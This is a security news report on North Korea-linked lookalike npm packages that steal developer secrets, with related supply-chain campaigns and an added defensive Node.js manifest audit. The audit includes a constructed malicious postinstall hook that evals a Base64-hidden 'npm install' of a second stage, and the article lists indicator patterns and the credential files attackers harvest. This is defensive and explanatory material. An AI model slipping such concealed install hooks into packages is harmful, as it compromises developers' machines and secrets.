North Korea-Linked npm Packages Target Developers with Stealthy Data Theft

"The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review," JFrog said. This tactic helped a cluster of malicious npm packages — linked by the reporter to threat actors with ties to North Korea — impersonate legitimate Rollup polyfill tooling to gain remote access and steal developer secrets.

JFrog analysis of rollup-packages-polyfill-core and rollup-runtime-polyfill-core

JFrog identified two primary packages, "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core," that mimic the legitimate "rollup-plugin-polyfill-node" project down to description, repository metadata, and package shape. Both packages were removed from the npm registry after discovery. Each lookalike hides a second-stage install: "rollup-packages-polyfill-core" installs and loads "swift-parse-stream," while "rollup-runtime-polyfill-core" installs "quirky-token." A number of other related packages were also removed: "quirky-token," "react-icon-svgs," "rollup-plugin-polyfill-connect," and "swift-parse-stream."

Second-stage packages, JSONKeeper, and concealed install-time execution

JFrog reported that the second-stage packages pose as SVG utilities, fetch a JSON object from JSONKeeper, and pass that object's "model" field to eval. The chain starts with a Base64-encoded "npm install" command for "swift-parse-stream" or "quirky-token" concealed within the top-level package, so the second stage is pulled in at install time rather than declared as a visible dependency. The layered structure — lookalike names, legitimate-looking metadata, hidden install-time execution, and environment checks — mirrors prior Lazarus-linked npm campaigns, JFrog said.

External fetch, sandbox evasion, and encrypted payload delivery

Once it has passed the environment gates that screen out cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure, the JavaScript reaches out to an external server at 216.126.236[.]244 to fetch an encrypted JavaScript payload. The decrypted payload acts as a loader for additional scripts that let the attacker interact with and control the compromised host.

Capabilities observed: remote control, credential theft, and developer-targeted collection

The later-stage payload provides both collection and control capabilities. JFrog described features that enable interactive terminal sessions, command execution, screenshot capture, process termination, and Windows-only mouse movement, clicks, scrolling, keyboard presses, and hotkeys using the "@nut-tree-fork/nut-js" package. The malware can steal data from web browsers and cryptocurrency wallets, collect files matching specific extensions, and periodically capture clipboard content. The file collector specifically searches for editor history associated with Microsoft Visual Studio Code, Windsurf, and Cursor, and for developer and AI tool configurations such as AWS, Microsoft Azure, Google Gemini, Anthropic Claude, Foundry, SSH, and Z shell (Zsh).

"Rollup plugins are commonly loaded from local configuration files, developer workstations, and CI jobs," JFrog noted, warning that these environments often have access to sensitive assets such as source code, npm tokens, Git credentials, cloud keys, SSH keys, browser data, and project secrets.

Concurrent supply chain discoveries by Checkmarx, SafeDep, and Chi Tran

  • Checkmarx found at least eight trojanized "pyrogram" forks published between November 2025 and June 2026, containing a hidden backdoor allowing arbitrary Python or shell commands and exfiltration of command results via Telegram; the activity was codenamed Operation Navy Ghost.
  • Investigators identified a cluster of 30 npm packages mimicking Polymarket tooling and general mathematics libraries that delivered a JavaScript infostealer reading crypto wallet vaults, browser credentials, SSH keys, AWS credentials, npm tokens, Docker configurations, shell history, and password manager databases.
  • A cluster of 25 npm packages under the @marketfront scope contained a postinstall credential harvester that reads 20 credential and secret files — including ~/.ssh, ~/.aws/credentials, ~/.kube/config, ~/.docker/config.json, ~/.npmrc, ~/.netrc, ~/.pgpass, ~/.git-credentials, and ~/.env — and exfiltrates the data.
  • A Python package named "security-alerts-sdk" harbored a backdoor that periodically polls 142.93.211[.]30:5000 for commands and exfiltrates SSH private keys, AWS credentials, Docker/npm/PyPI/git tokens, .env files, and browser credential databases to that server.
  • Researchers also reported clusters that download and execute Rust-compiled ELF binaries, a typosquat "events-runtime" that conditionally spawns a wallet stealer and exfiltrates reconnaissance data over Slack and Telegram, and an "o3forms" package that steals cloud credentials by splitting the attack between a benign registry package and a GitHub-pinned *-utils sub-dependency.

What this means for developer workstations, enterprises, and security teams

  • Developer workstations and CI/CD: Remove suspicious packages, assume compromise where they were installed, rotate credentials and keys, and block the malicious egress channels identified by investigators.
  • Enterprises and procurement leaders: Be wary of lookalike package names in rollup/polyfill/core/node naming spaces and enforce dependency scanning in CI/CD pipelines to flag newly published or suspicious packages.
  • Security teams and defenders: Monitor for hidden install-time execution, postinstall hooks, and second-stage fetches from JSONKeeper-like endpoints; prioritize detection of both collection and remote-control behaviors, given the overlap with known malware families like OtterCookie and BeaverTail.
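The following is an added example, not JFrog's tooling or code from the report: a small Node.js audit that applies the install-time and naming checks above to a package.json object. The manifest it inspects is constructed for illustration, the trusted-name list contains only the impersonated project named above, and the function names are hypothetical.

```javascript
// Added example: audit a package.json object for the install-time tricks described above.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const INDICATORS = [/\bnpm\s+(?:i|install)\b/i, /\beval\s*\(/, /jsonkeeper/i, /child_process/];
const TRUSTED = ['rollup-plugin-polyfill-node']; // the legitimate project being impersonated

// Decode Base64-looking runs so a concealed "npm install <second-stage>" becomes visible.
function decodeBase64Runs(text) {
  const decoded = [];
  for (const m of text.matchAll(/[A-Za-z0-9+/]{16,}={0,2}/g)) {
    const s = Buffer.from(m[0], 'base64').toString('utf8');
    if (s.length > 0 && /^[\x20-\x7e\s]+$/.test(s)) decoded.push(s); // keep printable decodes only
  }
  return decoded;
}

// Flag names that reuse two or more tokens of a trusted name without being that name.
function lookalikeOf(name, trusted = TRUSTED) {
  const tokens = new Set(name.split(/[-_@/]+/).filter(Boolean));
  for (const t of trusted) {
    if (t === name) return null;
    const shared = t.split(/[-_@/]+/).filter((w) => tokens.has(w));
    if (shared.length >= 2) return { trusted: t, shared };
  }
  return null;
}

// Report lookalike naming, any install-time hook, and indicators in the raw or decoded hook.
function auditManifest(pkg) {
  const findings = [];
  const look = lookalikeOf(pkg.name || '');
  if (look) findings.push(`name '${pkg.name}' shares '${look.shared.join(',')}' with '${look.trusted}'`);
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    findings.push(`install-time hook '${hook}': ${cmd}`);
    for (const text of [cmd, ...decodeBase64Runs(cmd)]) {
      for (const re of INDICATORS) {
        if (re.test(text)) findings.push(`${hook}: /${re.source}/ matched in "${text.trim()}"`);
      }
    }
  }
  return findings;
}

// Constructed sample manifest (not the real package): the Base64 string decodes to
// "npm install swift-parse-stream", the second stage named in the report.
const HIDDEN = 'bnBtIGluc3RhbGwgc3dpZnQtcGFyc2Utc3RyZWFt';
const SAMPLE = {
  name: 'rollup-packages-polyfill-core',
  scripts: { postinstall: `node -e "eval(Buffer.from('${HIDDEN}','base64').toString())"` },
};
```

Running `auditManifest(SAMPLE)` yields four findings: the lookalike name, the postinstall hook itself, the eval call in the raw script, and the decoded "npm install swift-parse-stream".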

JFrog stressed that the payload is broader than a simple downloader: once later stages run, attackers gain both collection and control capabilities targeted at developer environments where API keys, SSH keys, wallet material, cloud credentials, and project secrets are often present. The campaign's layered structure and lookalike naming echo previous Lazarus-linked npm activity, underscoring a sustained focus on poisoning open-source package repositories to steal valuable data.

https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html